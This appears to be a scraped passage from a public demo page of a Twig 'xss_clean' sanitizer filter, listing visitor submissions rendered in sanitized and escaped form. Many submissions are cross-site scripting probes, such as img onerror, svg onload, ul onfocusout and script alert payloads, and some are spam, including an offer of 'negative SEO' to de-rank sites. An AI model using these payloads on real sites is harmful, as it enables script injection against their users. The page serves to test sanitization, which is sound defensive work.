&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;ul onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by asd | at 2021-10-24 14:44:00</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><ul tabindex=1 id=x></ul>&lt;input autofocus&gt;\\r\\n\\r\\n<ul contenteditable>test</ul>\\r\\n\\r\\n<ul contenteditable>test</ul>\\r\\n\\r\\n<ul contenteditable>test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >test</ul>\\r\\n\\r\\n<ul >requires scrolling\\r\\n\\r\\n<ul contenteditable>test</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<ul onpointerrawupdate=alert&#40;1&#41;>XSS</ul>\\r\\n\\r\\n<ul >XSS</ul>\\r\\n\\r\\n<var draggable=\\\"true\\\" >test</var>\\r\\n\\r\\n<var draggable=\\\"true\\\" >test</var>\\r\\n\\r\\n<var draggable=\\\"true\\\" >test</var></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;ul tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;\\r\\n\\r\\n&lt;ul contenteditable&gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul contenteditable&gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul contenteditable&gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;requires scrolling\\r\\n\\r\\n&lt;ul contenteditable&gt;test&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul onpointerrawupdate=alert(1)&gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;ul &gt;XSS&lt;/ul&gt;\\r\\n\\r\\n&lt;var draggable=\\\&quot;true\\\&quot; &gt;test&lt;/var&gt;\\r\\n\\r\\n&lt;var draggable=\\\&quot;true\\\&quot; &gt;test&lt;/var&gt;\\r\\n\\r\\n&lt;var draggable=\\\&quot;true\\\&quot; &gt;test&lt;/var&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by asd | at 2021-10-24 14:43:34</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">util\\\"><img ></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">util\\\&quot;&gt;&lt;img src=x onerror=prompt(\\\&#039;_XSS\\\&#039;)&gt;</code> <p>keyword(s): util\\\"><img ></p> <p>description: util\\\"><img ></p> <p>by util\\\"><img > | at 2021-10-21 09:31:33</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\\\\\\\\\\\\\&quot;this\\\\\\\\\\\\\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): aa</p> <p>description: </p> <p>by aa | at 2021-10-21 04:10:26</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\&quot;this\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): keywords</p> <p>description: description</p> <p>by test | at 2021-10-20 16:10:16</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Greetings\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\\\\\\\r\\\\\\\\nhttps://www.speed-seo.net/product/negative-seo-service/\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Greetings\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\\\\\\\r\\\\\\\\nhttps://www.speed-seo.net/product/negative-seo-service/\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n\\r\\n</code> <p>keyword(s): keywords</p> <p>description: description</p> <p>by test | at 2021-10-20 16:09:41</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">pztti<img >i6q9xtsqh14></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">pztti&lt;img src=a onerror=alert(1)&gt;i6q9xtsqh14&gt;</code> <p>keyword(s): dd</p> <p>description: pztti<img >i6q9xtsqh14></p> <p>by dd | at 2021-10-20 12:40:43</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">dd</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">dd</code> <p>keyword(s): dd</p> <p>description: pztti<img >i6q9xtsqh14></p> <p>by dd | at 2021-10-20 12:39:35</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;\\r\\n</code> <p>keyword(s): dsq</p> <p>description: qds</p> <p>by sqd | at 2021-10-15 10:46:32</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">rg</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">rg</code> <p>keyword(s): eg</p> <p>description: eg</p> <p>by ge | at 2021-10-15 10:46:15</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><b>bold</b>\\r\\n<br><br>\\r\\n<div center\\\'>dddd</div></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;b&gt;bold&lt;/b&gt;\\r\\n&lt;br&gt;&lt;br&gt;\\r\\n&lt;div style=\\\&#039;text-align: center\\\&#039;&gt;dddd&lt;/div&gt;</code> <p>keyword(s): sdfg</p> <p>description: ssdfg</p> <p>by &lt;b&gt;test | at 2021-10-14 16:30:20</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by | at 2021-10-13 23:01:29</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">gdffggdgd</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">gdffggdgd</code> <p>keyword(s): ggfg</p> <p>description: gfgfd</p> <p>by dsdf | at 2021-10-13 22:16:39</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;</code> <p>keyword(s): dfdsf</p> <p>description: fsdfdfds</p> <p>by | at 2021-10-13 22:16:12</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Greetings\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Greetings\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</code> <p>keyword(s): </p> <p>description: Hi there\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</p> <p>by Kristina Willett | at 2021-10-13 15:12:04</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Amet labore quia ex</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Amet labore quia ex</code> <p>keyword(s): Ut deserunt ut illum</p> <p>description: Neque sint pariatur</p> <p>by Numquam ab corrupti | at 2021-10-12 23:33:56</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">ik</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">ik</code> <p>keyword(s): </p> <p>description: /,.</p> <p>by &lt;&gt; | at 2021-10-10 11:57:46</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">xss</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">xss</code> <p>keyword(s): test</p> <p>description: test</p> <p>by test | at 2021-10-10 11:55:48</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;svg&gt;&lt;/svg&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;svg&gt;&lt;/svg&gt;</code> <p>keyword(s): aa</p> <p>description: Test?=\\r\\n&gt;</p> <p>by ss | at 2021-10-09 15:28:58</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">ghjklhjk{}</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">ghjklhjk{}</code> <p>keyword(s): jjj</p> <p>description: jjj</p> <p>by gg | at 2021-10-09 15:28:09</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><img ></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;img src onerror=alert(10)&gt;</code> <p>keyword(s): </p> <p>description: Test</p> <p>by TEst | at 2021-10-09 14:15:45</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;svg&gt;&lt;svg &gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;svg&gt;&lt;svg onload=alert(1)&gt;</code> <p>keyword(s): 1</p> <p>description: 1</p> <p>by 1 | at 2021-10-08 15:25:39</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nVincent\\r\\nCustom Branded Product Specialist</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nVincent\\r\\nCustom Branded Product Specialist</code> <p>keyword(s): 